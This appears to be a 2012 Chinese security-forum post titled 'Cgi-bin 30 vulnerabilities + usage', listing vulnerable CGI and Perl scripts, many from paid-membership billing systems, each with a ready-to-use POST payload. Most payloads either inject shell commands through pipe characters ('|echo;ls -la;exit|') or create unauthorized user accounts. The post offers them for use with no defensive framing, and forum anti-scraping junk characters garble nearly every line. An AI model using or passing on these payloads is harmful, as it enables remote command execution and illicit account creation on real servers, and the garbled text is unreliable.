找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2450|回复: 0
打印 上一主题 下一主题

Cgi-bin 30个漏洞+使用方法

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 16:55:26 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
==============================
9 w9 H& X, f& n# m  _3 }: Y9 Q& W, c" H
/smspass.pl6 K  E. T- w) S9 ^$ M" H
username=username&password=password
  z: p/ `! R; z5 f5 p5 I' D3 T0 j9 l2 B
/index.cgi
' `8 C+ Z5 Y& s1 o; twei=ren&gen=command' g4 V& b7 t" v3 n
7 K. \* N4 t+ a5 U9 w4 |
/passmaster.cgi( L% S1 r$ G) }0 r' _
Action=Add&Username=Username&Password=Password3 Z5 E8 f# C; T$ h; K% N  B
* `6 n) W' X4 `9 [
/accountcreate.cgi7 X) w4 U, |) V
username=username&password=password&ref1=|echo;ls|" O6 Z5 o+ H9 a8 [! V% z( U5 {
# [8 j, l- J' [4 R2 S% G: u
/form.cgi/ B8 k% u2 G! w( t1 ?6 x  B' z
name=xxxx&email=email&subject=xxxx&response=|echo;ls|1 B/ n3 |& p9 O* e

0 F: P4 x* T8 S8 s3 ]+ `: u8 m/addusr.pl/ x2 u" R' s0 Z+ u* u( P2 }  l
/cgi-bin/EuroDebit/addusr.pl, v) d0 Y$ k6 U2 J6 m- Z
user=username&pass=Password&confirm=Password
" K' A; ^3 n) p9 @
! w! L/ N* w, G- ^9 w) ^/ccbill-local.asp  D' w5 w6 E- f# Y
post_values=username:password
7 r$ x2 x7 j% R7 M$ Q3 x$ e1 g8 `0 Y9 |) A
/count.cgi
  `) Y; |) A- ?. p, d3 Zpinfile=|echo;ls -la;exit|
4 g3 l2 c" S4 J( E
; d; o  H! A' v' s/recon.cgi1 Q# @! ^! R- ]3 H$ a
/recon.cgi?search/ a% q4 i; X# J! C1 V. y
searchoption=1&searchfor=|echo;ls -al;exit|) s3 A' _1 y& s. h, m  h$ ^$ T& w
5 x" K* P4 \! z
/verotelrum.pl3 L: u4 E5 R* r
vercode=username:password:dseegsow:add:amount<&30>- e9 t5 a+ P. I3 C4 S, I1 |& _

! @! q& U' y: s+ @$ |8 p1 Y" E) M/af.cgi
6 X! P* N: W$ n+ G* \_browser_out=|echo;ls -la;exit;|/ b. [1 f" Z$ d! o! B8 q3 z+ [; _

) D! k- m5 T) e2 a$ T/ h5 c1 c# B+ r/modify.cgi
! k0 x/ k; O! B6 n- ~6 u+ dusername=username&password=password&expire=30$ Z8 U/ U% P% {* W% z0 F4 [
9 J# r- `  H3 g* q" j
/openjournal.cgi# _' ?0 O) S5 Z. w6 K/ K
edit=1&ct=2&go=|echo;ls -al;exit|
1 ~' ^; v3 v( T/ ^- X- Y! @
6 c; Q) M! G/ t/gx9passwd.cgi
+ q( X* N2 }) M. N: b. G* ~% `cmd=ADD&user=username&pass=password) b0 v- s3 \! q3 K1 v  g
) T1 f4 Y/ w& f! p
/probecontrol.cgi$ H6 x! t6 p) @, g3 U
command=enable&username=username&password=password9 `! V  y' ]( U) t: A0 O

) c7 O2 g/ b, Y; d3 o- W7 Y/recon.cgi
. p1 k4 P5 v0 j9 D- l, b+ q4 psearchoption=3&searchfor=echo;ls -la;exit
7 |; ^& V% L0 U, ^/ n; w0 X
) Y0 [, i) ]8 U4 T1 v/htadd.pl
4 V3 p9 A7 u6 _9 `+ d" w9 o$ bconfigfile=|echo; ls -alt; exit
% {- I. }0 f; ~$ w3 T
1 P( \1 F; T1 @- |, E/gx9passwd.cgi5 v# T9 W/ l/ ?% E
cmd=ADD&user=username&pass=password
* n7 l# i! k, P7 P
  _* r- Z6 a6 b4 m/ibill*.pl( u& z0 b7 }( c  i6 ^8 m: h
reqtype=add&authpwd=authpwd&username=username&password=password  ~5 D, X/ t$ U' v& M

* C; r4 p$ q* W5 S5 F/ A/cpay.cgi
7 d3 F9 L3 n2 V, y1 R" c# Zcommand=add_member&username=username(EMAIL)&password=password(DES)9 W/ w: s/ V+ F
( B" b" V! k; j5 v0 S: w: z# P4 ~
/globill_ut.cgi
# N0 V8 m& G' a! vdo=add&username=username&password=password&wpassword=password. L3 Q% _8 F) y, {. q
, C0 A  N! r# ^  e
/usercontrol.cgi
( a6 a* t) l5 n8 p, |: jcommand=enable&username=USER&password=PASS- f, v& y! y+ H* y4 a
9 ?; E0 _$ q4 O% J" o, X
/globoSALErum.cgi- ?+ t) R4 u/ c( h4 h6 S
action=ADD&seccode=seccode&login=username&password=password: V' F9 a6 [1 u1 u" ?$ ?

: w- y( l% q5 Q% S/addusr.pl) m5 o# O6 v: O; X  `7 U" u
user=USER&pass=PASS&confirm=PASS
9 o- R) m# m# ~4 G# G  {! b+ f; ~6 f; A6 o
/pincount.cgi7 k% y: B. i- R/ a
/cgi-bin/mastergate/pincount.cgi
  E" u2 }6 R. }# E. P! ^% W$ O  Jpinfile=|echo;pwd;exit|
* C  C* l/ w6 s( o. C! w& S  U1 o8 d# h0 `9 `0 l8 m2 T
/accountcreate.cgi% z3 `# _6 t$ X; s
/cgi-bin/gateway/accountcreate.cgi
- f$ y4 {1 Q$ _! |username=username&password=password&password2=password&ref1=|echo;ls -al;exit  }9 K6 U6 ?/ N8 g5 I( l
& C4 S9 q" n' E7 Z
/af.cgi$ |& `- j, Y- u
/env.cgi
- y: \+ D; ~" X6 B, oADD+;echo;pwd;exit
; ?6 j5 Q( [0 |  h0 [* f  S8 J- L! N' d. C- E3 k: L1 H7 {
/count.cgi
0 t: p7 N9 y" e! apinfile=|echo;pwd;exit|
7 N6 c/ u- T+ @9 s7 c+ ^0 P( a+ ^4 ?$ y, \8 i! D, R
/recon.cgi
: N. w! s3 p* G6 Esearchoption=1&searchfor=|echo;ls%20-al;exit|; z  G! o% L8 v4 ^; X# H

+ t2 c  r4 B6 @8 W0 o/add.cgi9 d! x/ m& g" R7 V9 N
username=username&password=password&expire=30
: v7 a& p% k5 y8 p2 M& `* U. j  B& z
==============================
7 N) [4 I, }' ]1 p
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表